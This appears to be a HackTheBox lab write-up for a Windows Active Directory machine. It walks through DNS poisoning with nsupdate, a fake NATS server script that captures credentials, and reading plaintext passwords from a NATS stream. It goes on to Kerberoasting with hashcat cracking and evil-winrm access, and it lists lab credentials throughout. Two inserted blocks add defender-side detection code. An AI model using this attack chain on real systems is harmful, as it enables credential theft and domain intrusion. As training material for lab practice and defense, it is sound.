HackTheBox · Lab
Hard · Windows · Active Directory

NOTES

ENUMERATION

### NMAP


```shell
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
445/tcp   open  microsoft-ds?
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-time: 
|   date: 2025-09-15T21:29:05
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
```


### NFS


```shell
╰─❯ showmount -e $IP 
Export list for 10.10.11.78:
/MirageReports (everyone)
```


PDF reports found on the export:


(screenshot: SCR-20250915-oqhv.png)


### KERBEROS CONFIG (add to `/etc/krb5.conf`)


```ini
[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = MIRAGE.HTB

[realms]
    MIRAGE.HTB = {
        kdc = dc01.MIRAGE.HTB
        admin_server = dc01.MIRAGE.HTB
        default_domain = MIRAGE.HTB
    }

[domain_realm]
    .MIRAGE.HTB = MIRAGE.HTB
    MIRAGE.HTB = MIRAGE.HTB
```


### DNS Poisoning & Fake NATS Service


Our fake NATS server: it sends a minimal INFO banner that demands authentication, then logs whatever CONNECT message the client answers with.


```python
import socket

LISTEN = ("0.0.0.0", 4222)  # default NATS port; the poisoned A record sends clients here

print(f"[+] Fake NATS Server listening on {LISTEN[0]}:{LISTEN[1]}")
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(LISTEN)
s.listen(5)

while True:
    client, addr = s.accept()
    print(f"[+] Connection from {addr}")

    # A NATS server speaks first: advertising auth_required makes the client
    # reply with a CONNECT message that carries its credentials.
    client.sendall(b'INFO {"server_id":"FAKE","version":"2.11.0","auth_required":true}\r\n')
    data = client.recv(1024)
    print("[>] Received:")
    print(data.decode(errors="replace"))

    client.close()
```


Add an A record for nats-svc.mirage.htb pointing at our host via dynamic DNS update on the DC:


```shell
╰─❯ nsupdate
> server 10.10.11.78
> update add nats-svc.mirage.htb 60 A 10.10.14.14
> send
```


Run the fake server; the client connects and sends its credentials in the CONNECT message:


```shell
╰─❯ py fakeserver.py
[+] Fake NATS Server listening on 10.10.14.14:4222
[+] Connection from ('10.10.11.78', 54374)
[>] Received:
CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5h7F5554fP@1337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":false,"no_responders":false}
PING
```

- `Dev_Account_A:hx5h7F5554fP@1337!`
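As an added example (not part of the original notes), a small parser over the INFO/CONNECT exchange captured above that flags what makes this spoofing work from the defender's side: the server never demanded TLS, so the client handed its password to a peer it could not verify. The sample exchange is constructed and the password value is a placeholder.

```python
import json
import re

# Constructed sample of the INFO/CONNECT/PING exchange logged by the fake server
# (the password value is a placeholder, not the lab credential).
SAMPLE_EXCHANGE = (
    b'INFO {"server_id":"FAKE","version":"2.11.0","auth_required":true}\r\n'
    b'CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A",'
    b'"pass":"SAMPLE-PASSWORD","tls_required":false,"name":"NATS CLI Version 0.2.2",'
    b'"lang":"go","version":"1.41.1","protocol":1}\r\n'
    b'PING\r\n'
)

# NATS ops are "VERB [json]\r\n"; only the ops seen in this exchange are handled.
OP_RE = re.compile(rb"^(INFO|CONNECT|PING|PONG)(?:\s+(\{.*\}))?$")


def parse_nats_ops(raw: bytes) -> list:
    """Split a captured exchange into (verb, payload) pairs; payload is {} for bare PING/PONG."""
    ops = []
    for line in raw.split(b"\r\n"):
        if not line:
            continue
        m = OP_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised NATS op: {line!r}")
        payload = json.loads(m.group(2)) if m.group(2) else {}
        ops.append((m.group(1).decode(), payload))
    return ops


def audit_nats_exchange(raw: bytes) -> list:
    """Findings for a defender: a server that requires auth but not TLS (so the client
    cannot verify who it is talking to) and a password sent in the clear."""
    findings = []
    for verb, p in parse_nats_ops(raw):
        if verb == "INFO" and p.get("auth_required") and not p.get("tls_required"):
            findings.append("server requires auth but not TLS: client authenticates to an unverified peer")
        if verb == "CONNECT" and p.get("pass") and not p.get("tls_required"):
            findings.append(f"user {p['user']!r} sent a password in cleartext (tls_required=false)")
    return findings


if __name__ == "__main__":
    for finding in audit_nats_exchange(SAMPLE_EXCHANGE):
        print("[!]", finding)
```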

### NATS INTERACT


```shell
╰─❯ nats context add dev-nats --server nats://dc01.mirage.htb:4222 --user Dev_Account_A --password 'hx5h7F5554fP@1337!' --description "Dev access"
NATS Configuration Context "dev-nats"

  Description: Dev access
  Server URLs: nats://dc01.mirage.htb:4222
     Username: Dev_Account_A
     Password: ******************
         Path: /root/.config/nats/context/dev-nats.json
```


Subscribe to all subjects (`>`) to see what traffic flows:


```shell
╰─❯ nats --context dev-nats sub ">" --count 10  
17:25:04 Subscribing on > 
[#1] Received on "$JS.API.STREAM.INFO.auth_logs" with reply "_INBOX.PkApa0tTb8n38FYsClRe8l.sNSetcP3"
nil body


[#2] Received on "_INBOX.PkApa0tTb8n38FYsClRe8l.sNSetcP3"
{"type":"io.nats.jetstream.api.v1.stream_info_response","total":0,"offset":0,"limit":0,"config":{"name":"auth_logs","subjects":["logs.auth"],"retention":"limits","max_consumers":-1,"max_msgs":100,"max_bytes":1048576,"max_age":0,"max_msgs_per_subject":-1,"max_msg_size":-1,"discard":"new","storage":"file","num_replicas":1,"duplicate_window":120000000000,"compression":"none","allow_direct":true,"mirror_direct":false,"sealed":false,"deny_delete":true,"deny_purge":true,"allow_rollup_hdrs":false,"consumer_limits":{},"allow_msg_ttl":false,"metadata":{"_nats.level":"1","_nats.req.level":"0","_nats.ver":"2.11.3"}},"created":"2025-05-05T07:18:19.6244845Z","state":{"messages":5,"bytes":570,"first_seq":1,"first_ts":"2025-05-05T07:18:56.6788658Z","last_seq":5,"last_ts":"2025-05-05T07:19:27.2106658Z","num_subjects":1,"consumer_count":0},"cluster":{"leader":"NAJ27QKOTNDNVJIZAVUST3TQR6SMKZNC2INLPAW6544APA3LQVXSWHWC"},"ts":"2025-09-15T22:26:01.463391Z"}


[#3] Received on "$JS.EVENT.ADVISORY.API"
{"type":"io.nats.jetstream.advisory.v1.api_audit","id":"61g9tK2zjNEwHlBZMxdSbx","timestamp":"2025-09-15T22:26:01.463391Z","server":"NAJ27QKOTNDNVJIZAVUST3TQR6SMKZNC2INLPAW6544APA3LQVXSWHWC","client":{"start":"2025-09-15T15:26:01.4594175-07:00","host":"dead:beef::22d","id":137,"acc":"dev","user":"Dev_Account_A","name":"NATS CLI Version 0.2.2","lang":"go","ver":"1.41.1","rtt":2211400,"server":"NAJ27QKOTNDNVJIZAVUST3TQR6SMKZNC2INLPAW6544APA3LQVXSWHWC","kind":"Client","client_type":"nats"},"subject":"$JS.API.STREAM.INFO.auth_logs","response":"{\"type\":\"io.nats.jetstream.api.v1.stream_info_response\",\"total\":0,\"offset\":0,\"limit\":0,\"config\":{\"name\":\"auth_logs\",\"subjects\":[\"logs.auth\"],\"retention\":\"limits\",\"max_consumers\":-1,\"max_msgs\":100,\"max_bytes\":1048576,\"max_age\":0,\"max_msgs_per_subject\":-1,\"max_msg_size\":-1,\"discard\":\"new\",\"storage\":\"file\",\"num_replicas\":1,\"duplicate_window\":120000000000,\"compression\":\"none\",\"allow_direct\":true,\"mirror_direct\":false,\"sealed\":false,\"deny_delete\":true,\"deny_purge\":true,\"allow_rollup_hdrs\":false,\"consumer_limits\":{},\"allow_msg_ttl\":false,\"metadata\":{\"_nats.level\":\"1\",\"_nats.req.level\":\"0\",\"_nats.ver\":\"2.11.3\"}},\"created\":\"2025-05-05T07:18:19.6244845Z\",\"state\":{\"messages\":5,\"bytes\":570,\"first_seq\":1,\"first_ts\":\"2025-05-05T07:18:56.6788658Z\",\"last_seq\":5,\"last_ts\":\"2025-05-05T07:19:27.2106658Z\",\"num_subjects\":1,\"consumer_count\":0},\"cluster\":{\"leader\":\"NAJ27QKOTNDNVJIZAVUST3TQR6SMKZNC2INLPAW6544APA3LQVXSWHWC\"},\"ts\":\"2025-09-15T22:26:01.463391Z\"}"}
```


### Extract Data from NATS


```shell
╰─❯ nats --context dev-nats consumer add auth_logs audit-reader --pull --ack=explicit
[dev-nats] ? Start policy (all, new, last, subject, 1h, msg sequence) all
[dev-nats] ? Replay policy instant
[dev-nats] ? Filter Stream by subjects (blank for all) logs.auth
[dev-nats] ? Maximum Allowed Deliveries -1
[dev-nats] ? Maximum Acknowledgments Pending 0
[dev-nats] ? Deliver headers only without bodies No
[dev-nats] ? Add a Retry Backoff Policy No
```


```shell
╰─❯ nats --context dev-nats consumer next auth_logs audit-reader --count=5 --wait=5s --ack
[17:35:36] subj: logs.auth / tries: 1 / cons seq: 1 / str seq: 1 / pending: 4

{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
```

- `david.jjackson:pN8kQmn6b86!1234@`

### AUTH


```shell
╰─❯ nxc ldap $IP -u $USER -p $PASS -k
LDAP        10.10.11.78     389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        10.10.11.78     389    DC01             [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@
```


### FETCHING BLOODHOUND DATA


(screenshot: SCR-20250915-ppzn.png)


### KERBEROAST


```shell
╰─❯ GetUserSPNs.py 'mirage.htb/david.jjackson' -dc-host dc01.mirage.htb -k -request
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies 

Password:
[-] CCache file is not found. Skipping...
ServicePrincipalName      Name          MemberOf                                                             PasswordLastSet             LastLogon                   Delegation 
------------------------  ------------  -------------------------------------------------------------------  --------------------------  --------------------------  ----------
HTTP/exchange.mirage.htb  nathan.aadam  CN=Exchange_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb  2025-06-23 23:18:18.584667  2025-07-04 22:01:43.511763             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb/nathan.aadam*$5a1b53f2802e760a4bfda2fcd33e661e$<hash truncated>
```


### Cracked with Hashcat


```shell
╰─❯ hashcat -m 13100 nathan.aadam.krbtgs.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

$krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb/nathan.aadam*$5a1b53f2802e760a4bfda2fcd33e661e$<hash truncated>:3edc#EDC3
                                                          
Session..........: hashcat
Status...........: Cracked

# 3edc#EDC3
```

- `nathan.aadam:3edc#EDC3`
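Added example (not part of the original notes): the defender-side view of the Kerberoast request above, as detection logic over constructed 4769 (service ticket request) events. A ticket issued with TicketEncryptionType 0x17 (RC4, the etype 23 in the `$krb5tgs$23$` line) for a user account that holds an SPN is the thing to alert on; the field names follow the Windows Security log, the event values are made up.

```python
from collections import defaultdict

# Constructed sample of Security log 4769 events as a SIEM would hand them over.
# Names echo the note above; the values are illustrative, not real log data.
SAMPLE_4769 = [
    {"EventID": 4769, "TargetUserName": "david.jjackson@MIRAGE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.14"},
    {"EventID": 4769, "TargetUserName": "david.jjackson@MIRAGE.HTB", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.14"},
    {"EventID": 4769, "TargetUserName": "david.jjackson@MIRAGE.HTB", "ServiceName": "nathan.aadam",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.14"},
    {"EventID": 4769, "TargetUserName": "svc_backup@MIRAGE.HTB", "ServiceName": "nathan.aadam",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.20"},
]

RC4_HMAC = "0x17"  # TicketEncryptionType for etype 23, the hash type hashcat mode 13100 cracks


def is_roastable_request(ev: dict) -> bool:
    """A 4769 for a user (not machine) service account issued with RC4 is the signature of
    a request like the GetUserSPNs.py run above: the ticket is RC4 either because the client
    asked for it or because the SPN account is not configured for AES."""
    svc = ev.get("ServiceName", "")
    return (
        ev.get("EventID") == 4769
        and ev.get("TicketEncryptionType") == RC4_HMAC
        and svc.lower() != "krbtgt"   # TGT traffic, not a service ticket of interest
        and not svc.endswith("$")     # machine accounts have long random passwords
    )


def roasting_requesters(events: list) -> dict:
    """Map requester -> set of RC4 service tickets they pulled. One hit is worth a look;
    many SPNs from one principal in a short window is the bulk-roast pattern."""
    hits = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            hits[ev["TargetUserName"]].add(ev["ServiceName"])
    return dict(hits)


if __name__ == "__main__":
    for who, spns in roasting_requesters(SAMPLE_4769).items():
        print(f"[!] {who} requested RC4 tickets for: {sorted(spns)}")
```

The mitigation that turns this finding off at the source is to set the SPN account (or better, a gMSA replacing it) to AES-only encryption types and give it a long random password.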

### Grab TGT


```shell
╰─❯ getTGT.py mirage.htb/nathan.aadam:'3edc#EDC3'
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in nathan.aadam.ccache
```


### Export ticket


```shell
╰─❯ export KRB5CCNAME=nathan.aadam.ccache
```



FOOTHOLD

### Access with Evil-WinRM


```shell
╰─❯ evil-winrm -i dc01.mirage.htb -r mirage.htb
                                        
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>
```

PRIVILEGE ESCALATION

### Winlogon creds


(screenshot: image.png)

- `mark.bbond:1day@atime`

### Further enumeration


This user (mark.bbond) has password change rights over javier.mmarshall.

SYSTEM OWNAGE

CLEANUP

WEB SERVICE TECHNOLOGY

WEB

NIKTO

WFUZZ / GOBUSTER

### FILES


### DIRS


### SUBDIRS


### VHOSTS

SCOPE

| IP | HOSTNAME | DOMAIN NAME | OS |
|---|---|---|---|
| 10.10.11.78 | dc01 | mirage.htb | Windows |

USERS

CREDENTIALS

NMAP

SMB SHARES

OTHER NOTES

LOGS


ⓒ 0xNRG